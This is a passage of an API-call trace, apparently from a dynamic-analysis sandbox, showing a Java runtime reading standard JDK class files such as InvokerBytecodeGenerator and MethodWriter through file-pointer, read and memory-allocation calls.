lpNumberOfBytesRead=0x2089fb0*=0x884, lpOverlapped=0x0) returned 1 [0115.174] free (_Block=0x12ef15f0) [0115.174] free (_Block=0x12ed3fc0) [0115.197] strlen (_Str="java/lang/invoke/InvokerBytecodeGenerator.class") returned 0x2f [0115.197] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.197] malloc (_Size=0xa0) returned 0x12dac860 [0115.197] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34154ac, lpNewFilePointer=0x2089d00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089d00*=54613164) returned 1 [0115.197] ReadFile (in: hFile=0x134, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089cd0, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x2089cd0*=0xa0, lpOverlapped=0x0) returned 1 [0115.198] malloc (_Size=0x30) returned 0x12ef4410 [0115.199] strlen (_Str="java/lang/invoke/InvokerBytecodeGenerator.class") returned 0x2f [0115.199] strcpy (in: _Dest=0x2089e80, _Source="java/lang/invoke/InvokerBytecodeGenerator.class" | out: _Dest="java/lang/invoke/InvokerBytecodeGenerator.class") returned="java/lang/invoke/InvokerBytecodeGenerator.class" [0115.199] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x304f6be, lpNewFilePointer=0x2089900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089900*=50656958) returned 1 [0115.199] ReadFile (in: hFile=0x134, lpBuffer=0x2089950, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x20898d0, lpOverlapped=0x0 | out: lpBuffer=0x2089950*, lpNumberOfBytesRead=0x20898d0*=0x1e, lpOverlapped=0x0) returned 1 [0115.201] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x304f70b, lpNewFilePointer=0x2089960, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089960*=50657035) returned 1 [0115.201] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x689c, lpNumberOfBytesRead=0x2089930, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x2089930*=0x689c, lpOverlapped=0x0) returned 1 [0115.203] free (_Block=0x12ef4250) [0115.203] free (_Block=0x1228ed20) [0115.224] malloc (_Size=0x48) returned 0x1228ed20 [0115.225] malloc (_Size=0xa0) returned 0x12daace0 [0115.225] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341544e, lpNewFilePointer=0x2089e60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089e60*=54613070) returned 1 [0115.225] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089e30, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x2089e30*=0xa0, lpOverlapped=0x0) returned 1 [0115.225] malloc (_Size=0x31) returned 0x12ef4250 [0115.225] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x304b34a, lpNewFilePointer=0x2089a60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089a60*=50639690) returned 1 [0115.225] ReadFile (in: hFile=0x134, lpBuffer=0x2089ab0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089a30, lpOverlapped=0x0 | out: lpBuffer=0x2089ab0*, lpNumberOfBytesRead=0x2089a30*=0x1e, lpOverlapped=0x0) returned 1 [0115.226] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x304b398, lpNewFilePointer=0x2089ac0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089ac0*=50639768) returned 1 [0115.226] ReadFile (in: hFile=0x134, lpBuffer=0x12ea9d30, nNumberOfBytesToRead=0x4326, lpNumberOfBytesRead=0x2089a90, lpOverlapped=0x0 | out: lpBuffer=0x12ea9d30*, lpNumberOfBytesRead=0x2089a90*=0x4326, lpOverlapped=0x0) returned 1 [0115.228] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.228] malloc (_Size=0xa0) returned 0x12dac230 [0115.228] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34153ef, lpNewFilePointer=0x2089420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089420*=54612975) returned 1 [0115.228] ReadFile (in: hFile=0x134, lpBuffer=0x12dac230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x20893f0, lpOverlapped=0x0 | out: lpBuffer=0x12dac230*, lpNumberOfBytesRead=0x20893f0*=0xa0, lpOverlapped=0x0) returned 1 [0115.228] malloc (_Size=0x32) returned 0x12ef4410 [0115.228] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x304aae6, lpNewFilePointer=0x2089020, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089020*=50637542) returned 1 [0115.228] ReadFile (in: hFile=0x134, lpBuffer=0x2089070, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2088ff0, lpOverlapped=0x0 | out: lpBuffer=0x2089070*, lpNumberOfBytesRead=0x2088ff0*=0x1e, lpOverlapped=0x0) returned 1 [0115.229] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x304ab35, lpNewFilePointer=0x2089080, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089080*=50637621) returned 1 [0115.229] ReadFile (in: hFile=0x134, lpBuffer=0x12eae230, nNumberOfBytesToRead=0x815, lpNumberOfBytesRead=0x2089050, lpOverlapped=0x0 | out: lpBuffer=0x12eae230*, lpNumberOfBytesRead=0x2089050*=0x815, lpOverlapped=0x0) returned 1 [0115.231] malloc (_Size=0x48) returned 0x1228ed20 [0115.231] malloc (_Size=0xa0) returned 0x12dac0d0 [0115.231] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415392, lpNewFilePointer=0x2089df0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089df0*=54612882) returned 1 [0115.231] ReadFile (in: hFile=0x134, lpBuffer=0x12dac0d0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089dc0, lpOverlapped=0x0 | out: lpBuffer=0x12dac0d0*, lpNumberOfBytesRead=0x2089dc0*=0xa0, lpOverlapped=0x0) returned 1 [0115.231] malloc (_Size=0x30) returned 0x12ef4250 [0115.231] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x304a106, lpNewFilePointer=0x20899f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899f0*=50635014) returned 1 [0115.231] ReadFile (in: hFile=0x134, lpBuffer=0x2089a40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x20899c0, lpOverlapped=0x0 | out: lpBuffer=0x2089a40*, lpNumberOfBytesRead=0x20899c0*=0x1e, lpOverlapped=0x0) returned 1 [0115.231] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x304a153, lpNewFilePointer=0x2089a50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089a50*=50635091) returned 1 [0115.232] ReadFile (in: hFile=0x134, lpBuffer=0x12ea9d30, nNumberOfBytesToRead=0x993, lpNumberOfBytesRead=0x2089a20, lpOverlapped=0x0 | out: lpBuffer=0x12ea9d30*, lpNumberOfBytesRead=0x2089a20*=0x993, lpOverlapped=0x0) returned 1 [0115.233] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.233] malloc (_Size=0xa0) returned 0x12daace0 [0115.233] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341533b, lpNewFilePointer=0x2089df0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089df0*=54612795) returned 1 [0115.233] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089dc0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x2089dc0*=0xa0, lpOverlapped=0x0) returned 1 [0115.233] malloc (_Size=0x2a) returned 0x12ef4410 [0115.233] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3049909, lpNewFilePointer=0x20899f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899f0*=50632969) returned 1 [0115.233] ReadFile (in: hFile=0x134, lpBuffer=0x2089a40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x20899c0, lpOverlapped=0x0 | out: lpBuffer=0x2089a40*, lpNumberOfBytesRead=0x20899c0*=0x1e, lpOverlapped=0x0) returned 1 [0115.234] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3049950, lpNewFilePointer=0x2089a50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089a50*=50633040) returned 1 [0115.234] ReadFile (in: hFile=0x134, lpBuffer=0x12ea9d30, nNumberOfBytesToRead=0x7b6, lpNumberOfBytesRead=0x2089a20, lpOverlapped=0x0 | out: lpBuffer=0x12ea9d30*, lpNumberOfBytesRead=0x2089a20*=0x7b6, lpOverlapped=0x0) returned 1 [0115.237] malloc (_Size=0x48) returned 0x1228ed20 [0115.237] malloc (_Size=0xa0) returned 0x12dab310 [0115.237] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34152dc, lpNewFilePointer=0x2089de0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089de0*=54612700) returned 1 [0115.237] ReadFile (in: hFile=0x134, lpBuffer=0x12dab310, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089db0, lpOverlapped=0x0 | out: lpBuffer=0x12dab310*, lpNumberOfBytesRead=0x2089db0*=0xa0, lpOverlapped=0x0) returned 1 [0115.237] malloc (_Size=0x32) returned 0x12ef4250 [0115.238] strlen (_Str="jdk/internal/org/objectweb/asm/MethodWriter.class") returned 0x31 [0115.238] strcpy (in: _Dest=0x2089f60, _Source="jdk/internal/org/objectweb/asm/MethodWriter.class" | out: _Dest="jdk/internal/org/objectweb/asm/MethodWriter.class") returned="jdk/internal/org/objectweb/asm/MethodWriter.class" [0115.238] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3042d94, lpNewFilePointer=0x20899e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899e0*=50605460) returned 1 [0115.238] ReadFile (in: hFile=0x134, lpBuffer=0x2089a30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x20899b0, lpOverlapped=0x0 | out: lpBuffer=0x2089a30*, lpNumberOfBytesRead=0x20899b0*=0x1e, lpOverlapped=0x0) returned 1 [0115.239] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3042de3, lpNewFilePointer=0x2089a40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089a40*=50605539) returned 1 [0115.239] ReadFile (in: hFile=0x134, lpBuffer=0x12ea9d30, nNumberOfBytesToRead=0x6b26, lpNumberOfBytesRead=0x2089a10, lpOverlapped=0x0 | out: lpBuffer=0x12ea9d30*, lpNumberOfBytesRead=0x2089a10*=0x6b26, lpOverlapped=0x0) returned 1 [0115.241] free (_Block=0x12ef4410) [0115.241] free (_Block=0x12ed3fc0) [0115.257] strlen (_Str="jdk/internal/org/objectweb/asm/MethodVisitor.class") returned 0x32 [0115.257] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.257] malloc (_Size=0xa0) returned 0x12dabc00 [0115.257] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341527c, lpNewFilePointer=0x20893a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20893a0*=54612604) returned 1 [0115.257] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089370, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x2089370*=0xa0, lpOverlapped=0x0) returned 1 [0115.257] malloc (_Size=0x33) returned 0x12ef4410 [0115.258] strlen (_Str="jdk/internal/org/objectweb/asm/MethodVisitor.class") returned 0x32 [0115.258] strcpy (in: _Dest=0x2089520, _Source="jdk/internal/org/objectweb/asm/MethodVisitor.class" | out: _Dest="jdk/internal/org/objectweb/asm/MethodVisitor.class") returned="jdk/internal/org/objectweb/asm/MethodVisitor.class" [0115.258] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3041a16, lpNewFilePointer=0x2088fa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2088fa0*=50600470) returned 1 [0115.258] ReadFile (in: hFile=0x134, lpBuffer=0x2088ff0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2088f70, lpOverlapped=0x0 | out: lpBuffer=0x2088ff0*, lpNumberOfBytesRead=0x2088f70*=0x1e, lpOverlapped=0x0) returned 1 [0115.259] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3041a66, lpNewFilePointer=0x2089000, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089000*=50600550) returned 1 [0115.259] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x132e, lpNumberOfBytesRead=0x2088fd0, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x2088fd0*=0x132e, lpOverlapped=0x0) returned 1 [0115.260] free (_Block=0x12ef4250) [0115.260] free (_Block=0x1228ed20) [0115.273] malloc (_Size=0x48) returned 0x1228ed20 [0115.273] malloc (_Size=0xa0) returned 0x12dac7b0 [0115.273] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415225, lpNewFilePointer=0x2089a80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089a80*=54612517) returned 1 [0115.274] ReadFile (in: hFile=0x134, lpBuffer=0x12dac7b0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089a50, lpOverlapped=0x0 | out: lpBuffer=0x12dac7b0*, lpNumberOfBytesRead=0x2089a50*=0xa0, lpOverlapped=0x0) returned 1 [0115.274] malloc (_Size=0x2a) returned 0x12ef4250 [0115.274] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303fc5a, lpNewFilePointer=0x2089680, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089680*=50592858) returned 1 [0115.274] ReadFile (in: hFile=0x134, lpBuffer=0x20896d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089650, lpOverlapped=0x0 | out: lpBuffer=0x20896d0*, lpNumberOfBytesRead=0x2089650*=0x1e, lpOverlapped=0x0) returned 1 [0115.284] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303fca1, lpNewFilePointer=0x20896e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20896e0*=50592929) returned 1 [0115.284] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x1d75, lpNumberOfBytesRead=0x20896b0, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x20896b0*=0x1d75, lpOverlapped=0x0) returned 1 [0115.287] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.287] malloc (_Size=0xa0) returned 0x12daaef0 [0115.287] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34151cd, lpNewFilePointer=0x2089d30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089d30*=54612429) returned 1 [0115.287] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089d00, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x2089d00*=0xa0, lpOverlapped=0x0) returned 1 [0115.289] malloc (_Size=0x2b) returned 0x12ef4410 [0115.289] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303ee6e, lpNewFilePointer=0x2089930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089930*=50589294) returned 1 [0115.289] ReadFile (in: hFile=0x134, lpBuffer=0x2089980, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089900, lpOverlapped=0x0 | out: lpBuffer=0x2089980*, lpNumberOfBytesRead=0x2089900*=0x1e, lpOverlapped=0x0) returned 1 [0115.291] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303eeb6, lpNewFilePointer=0x2089990, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089990*=50589366) returned 1 [0115.291] ReadFile (in: hFile=0x134, lpBuffer=0x12ea9d30, nNumberOfBytesToRead=0xda4, lpNumberOfBytesRead=0x2089960, lpOverlapped=0x0 | out: lpBuffer=0x12ea9d30*, lpNumberOfBytesRead=0x2089960*=0xda4, lpOverlapped=0x0) returned 1 [0115.292] malloc (_Size=0x48) returned 0x1228ed20 [0115.292] malloc (_Size=0xa0) returned 0x12daafa0 [0115.292] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415175, lpNewFilePointer=0x2089cd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089cd0*=54612341) returned 1 [0115.293] ReadFile (in: hFile=0x134, lpBuffer=0x12daafa0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089ca0, lpOverlapped=0x0 | out: lpBuffer=0x12daafa0*, lpNumberOfBytesRead=0x2089ca0*=0xa0, lpOverlapped=0x0) returned 1 [0115.293] malloc (_Size=0x2b) returned 0x12ef4250 [0115.294] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303ca79, lpNewFilePointer=0x20898d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20898d0*=50580089) returned 1 [0115.294] ReadFile (in: hFile=0x134, lpBuffer=0x2089920, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x20898a0, lpOverlapped=0x0 | out: lpBuffer=0x2089920*, lpNumberOfBytesRead=0x20898a0*=0x1e, lpOverlapped=0x0) returned 1 [0115.295] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303cac1, lpNewFilePointer=0x2089930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089930*=50580161) returned 1 [0115.295] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x23ad, lpNumberOfBytesRead=0x2089900, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x2089900*=0x23ad, lpOverlapped=0x0) returned 1 [0115.297] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.297] malloc (_Size=0xa0) returned 0x12dac230 [0115.297] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415112, lpNewFilePointer=0x2089e60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089e60*=54612242) returned 1 [0115.297] ReadFile (in: hFile=0x134, lpBuffer=0x12dac230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089e30, lpOverlapped=0x0 | out: lpBuffer=0x12dac230*, lpNumberOfBytesRead=0x2089e30*=0xa0, lpOverlapped=0x0) returned 1 [0115.298] malloc (_Size=0x36) returned 0x12ef4410 [0115.299] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303b6bd, lpNewFilePointer=0x2089a60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089a60*=50575037) returned 1 [0115.299] ReadFile (in: hFile=0x134, lpBuffer=0x2089ab0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089a30, lpOverlapped=0x0 | out: lpBuffer=0x2089ab0*, lpNumberOfBytesRead=0x2089a30*=0x1e, lpOverlapped=0x0) returned 1 [0115.300] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303b710, lpNewFilePointer=0x2089ac0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089ac0*=50575120) returned 1 [0115.300] ReadFile (in: hFile=0x134, lpBuffer=0x12ea9d30, nNumberOfBytesToRead=0x1369, lpNumberOfBytesRead=0x2089a90, lpOverlapped=0x0 | out: lpBuffer=0x12ea9d30*, lpNumberOfBytesRead=0x2089a90*=0x1369, lpOverlapped=0x0) returned 1 [0115.301] malloc (_Size=0x48) returned 0x1228ed20 [0115.301] malloc (_Size=0xa0) returned 0x12dab310 [0115.301] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34150ae, lpNewFilePointer=0x2089420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089420*=54612142) returned 1 [0115.301] ReadFile (in: hFile=0x134, lpBuffer=0x12dab310, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x20893f0, lpOverlapped=0x0 | out: lpBuffer=0x12dab310*, lpNumberOfBytesRead=0x20893f0*=0xa0, lpOverlapped=0x0) returned 1 [0115.302] malloc (_Size=0x37) returned 0x12ef4250 [0115.302] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303b1f8, lpNewFilePointer=0x2089020, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089020*=50573816) returned 1 [0115.302] ReadFile (in: hFile=0x134, lpBuffer=0x2089070, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2088ff0, lpOverlapped=0x0 | out: lpBuffer=0x2089070*, lpNumberOfBytesRead=0x2088ff0*=0x1e, lpOverlapped=0x0) returned 1 [0115.303] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303b24c, lpNewFilePointer=0x2089080, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089080*=50573900) returned 1 [0115.303] ReadFile (in: hFile=0x134, lpBuffer=0x12eab290, nNumberOfBytesToRead=0x471, lpNumberOfBytesRead=0x2089050, lpOverlapped=0x0 | out: lpBuffer=0x12eab290*, lpNumberOfBytesRead=0x2089050*=0x471, lpOverlapped=0x0) returned 1 [0115.304] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.304] malloc (_Size=0xa0) returned 0x12dab7e0 [0115.304] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341504f, lpNewFilePointer=0x2089d40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089d40*=54612047) returned 1 [0115.304] ReadFile (in: hFile=0x134, lpBuffer=0x12dab7e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089d10, lpOverlapped=0x0 | out: lpBuffer=0x12dab7e0*, lpNumberOfBytesRead=0x2089d10*=0xa0, lpOverlapped=0x0) returned 1 [0115.305] malloc (_Size=0x32) returned 0x12ef4410 [0115.305] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303aca6, lpNewFilePointer=0x2089940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089940*=50572454) returned 1 [0115.305] ReadFile (in: hFile=0x134, lpBuffer=0x2089990, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089910, lpOverlapped=0x0 | out: lpBuffer=0x2089990*, lpNumberOfBytesRead=0x2089910*=0x1e, lpOverlapped=0x0) returned 1 [0115.306] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303acf5, lpNewFilePointer=0x20899a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899a0*=50572533) returned 1 [0115.306] ReadFile (in: hFile=0x134, lpBuffer=0x12ea9d30, nNumberOfBytesToRead=0x503, lpNumberOfBytesRead=0x2089970, lpOverlapped=0x0 | out: lpBuffer=0x12ea9d30*, lpNumberOfBytesRead=0x2089970*=0x503, lpOverlapped=0x0) returned 1 [0115.308] malloc (_Size=0x48) returned 0x1228ed20 [0115.308] malloc (_Size=0xa0) returned 0x12dabe10 [0115.308] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414ff0, lpNewFilePointer=0x2089d90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089d90*=54611952) returned 1 [0115.308] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089d60, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x2089d60*=0xa0, lpOverlapped=0x0) returned 1 [0115.309] malloc (_Size=0x32) returned 0x12ef4250 [0115.309] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303a3bc, lpNewFilePointer=0x2089990, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089990*=50570172) returned 1 [0115.309] ReadFile (in: hFile=0x134, lpBuffer=0x20899e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089960, lpOverlapped=0x0 | out: lpBuffer=0x20899e0*, lpNumberOfBytesRead=0x2089960*=0x1e, lpOverlapped=0x0) returned 1 [0115.310] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303a40b, lpNewFilePointer=0x20899f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899f0*=50570251) returned 1 [0115.310] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x89b, lpNumberOfBytesRead=0x20899c0, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x20899c0*=0x89b, lpOverlapped=0x0) returned 1 [0115.318] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.318] malloc (_Size=0xa0) returned 0x12dab100 [0115.318] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414fa2, lpNewFilePointer=0x2089940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089940*=54611874) returned 1 [0115.318] ReadFile (in: hFile=0x134, lpBuffer=0x12dab100, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089910, lpOverlapped=0x0 | out: lpBuffer=0x12dab100*, lpNumberOfBytesRead=0x2089910*=0xa0, lpOverlapped=0x0) returned 1 [0115.319] malloc (_Size=0x21) returned 0x12ef1590 [0115.319] strlen (_Str="sun/invoke/util/VerifyType.class") returned 0x20 [0115.319] strcpy (in: _Dest=0x2089ac0, _Source="sun/invoke/util/VerifyType.class" | out: _Dest="sun/invoke/util/VerifyType.class") returned="sun/invoke/util/VerifyType.class" [0115.319] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3039a1c, lpNewFilePointer=0x2089540, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089540*=50567708) returned 1 [0115.319] ReadFile (in: hFile=0x134, lpBuffer=0x2089590, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089510, lpOverlapped=0x0 | out: lpBuffer=0x2089590*, lpNumberOfBytesRead=0x2089510*=0x1e, lpOverlapped=0x0) returned 1 [0115.321] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3039a5a, lpNewFilePointer=0x20895a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20895a0*=50567770) returned 1 [0115.321] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x962, lpNumberOfBytesRead=0x2089570, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x2089570*=0x962, lpOverlapped=0x0) returned 1 [0115.322] free (_Block=0x12ef4250) [0115.322] free (_Block=0x1228ed20) [0115.334] strlen (_Str="sun/invoke/empty/Empty.class") returned 0x1c [0115.334] malloc (_Size=0x48) returned 0x1228ed20 [0115.334] malloc (_Size=0xa0) returned 0x12daaef0 [0115.334] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414f58, lpNewFilePointer=0x2089b30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089b30*=54611800) returned 1 [0115.334] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089b00, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x2089b00*=0xa0, lpOverlapped=0x0) returned 1 [0115.335] malloc (_Size=0x1d) returned 0x12ef1530 [0115.336] strlen (_Str="sun/invoke/empty/Empty.class") returned 0x1c [0115.336] strcpy (in: _Dest=0x2089cb0, _Source="sun/invoke/empty/Empty.class" | out: _Dest="sun/invoke/empty/Empty.class") returned="sun/invoke/empty/Empty.class" [0115.336] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3039930, lpNewFilePointer=0x2089730, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089730*=50567472) returned 1 [0115.336] ReadFile (in: hFile=0x134, lpBuffer=0x2089780, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089700, lpOverlapped=0x0 | out: lpBuffer=0x2089780*, lpNumberOfBytesRead=0x2089700*=0x1e, lpOverlapped=0x0) returned 1 [0115.337] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303996a, lpNewFilePointer=0x2089790, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089790*=50567530) returned 1 [0115.337] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0xb2, lpNumberOfBytesRead=0x2089760, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x2089760*=0xb2, lpOverlapped=0x0) returned 1 [0115.338] free (_Block=0x12ef1590) [0115.338] free (_Block=0x12ed3fc0) [0115.352] strlen (_Str="java/util/HashMap$Values.class") returned 0x1e [0115.352] malloc (_Size=0x48) returned 0x12ed3fc0 [0115.352] malloc (_Size=0xa0) returned 0x12dab100 [0115.352] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415712, lpNewFilePointer=0x2089e10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089e10*=54613778) returned 1 [0115.352] ReadFile (in: hFile=0x134, lpBuffer=0x12dab100, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089de0, lpOverlapped=0x0 | out: lpBuffer=0x12dab100*, lpNumberOfBytesRead=0x2089de0*=0xa0, lpOverlapped=0x0) returned 1 [0115.353] malloc (_Size=0x1f) returned 0x12ef1560 [0115.354] strlen (_Str="java/util/HashMap$Values.class") returned 0x1e [0115.354] strcpy (in: _Dest=0x2089f90, _Source="java/util/HashMap$Values.class" | out: 